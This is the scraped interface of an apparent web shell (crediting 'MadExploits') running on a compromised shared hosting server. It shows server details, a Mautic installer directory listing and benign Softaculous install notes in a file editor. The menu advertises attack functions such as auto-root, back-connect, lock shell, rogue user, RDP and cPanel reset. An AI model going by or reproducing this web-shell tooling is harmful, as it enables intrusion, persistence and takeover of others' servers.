Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.118.154.237
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
mautic /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
5.71
KB
-rw-r--r--
_clone.php
3.87
KB
-rw-r--r--
_edit.php
3.59
KB
-rw-r--r--
_edit.xml
433
B
-rw-r--r--
extend.php
8.8
KB
-rw-r--r--
fileindex.php
378
B
-rw-r--r--
import.php
3.35
KB
-rw-r--r--
info.xml
4.14
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
7.69
KB
-rw-r--r--
install.xml
2.12
KB
-rw-r--r--
local.php
457
B
-rw-r--r--
mautic.sql
155.28
KB
-rw-r--r--
mautic.zip
64.62
MB
-rw-r--r--
md5
2.99
KB
-rw-r--r--
notes.txt
1.82
KB
-rw-r--r--
update_pass.php
496
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1. Select mysqli for database setup (Since 5.0.x mautic has dropped the support for mysqli driver. Only pdo_mysql is supported)) 2. Email configuration -> send immediately and Other SMTP Server 3. In local.php 'install_source' => 'Softaculous', (has to be Softaculous) 4. We have excluded files "appProdProjectContainer.php","appProdProjectContainer.php.meta" from "app/cache/prod/" directory in install.xml because these file have default database details and does not get updated via Softaculous hence we have excluded it and it should get generated at first visit of installation. 5. PHP REQUIREMENT LINK : https://www.mautic.org/download/requirements release_metadata.json 6. Upgrade is not possible since the vendor himself is not recommending us to do it via CURL as it may not complete the upgrade process and corrupt the installation. Hence he is insisting on to use CLI or the internal upgrade(chat is done via email) since 2.12.1. 7. Make manual installation on cpanel if it doesn't work on webuzo(non-suphp) It requires to delete app/cache/prod multiple time during manual installation to complete the installation on non-suphp server. 8. Languages are downloaded from https://language-packs.mautic.com/[[lang_code]].zip 9. Mautic 4.2.0 onwards requires Apache 2.4 and dosn't work on apache 2.2 https://github.com/mautic/mautic/issues/10913 10. Mautic only supports Apache, Nginx and IIS servers. https://www.mautic.org/download/requirements (Confirmed over email as well.) 11. [IMP] Add [[relativeurl]] in line 113 of .htaccess to start the installation in a sub directory. <If "%{REQUEST_URI} =~ m#^[[relativeurl]]/(index|index_dev|upgrade/upgrade)\.php#"> 12. Make sure to change [[collation]] at generated_email_domain in [[dbprefix]]leads Table. This is to handle MariaDB issue. 13. In local.php 'locale' => '[[language]]', (add this line at end)
Close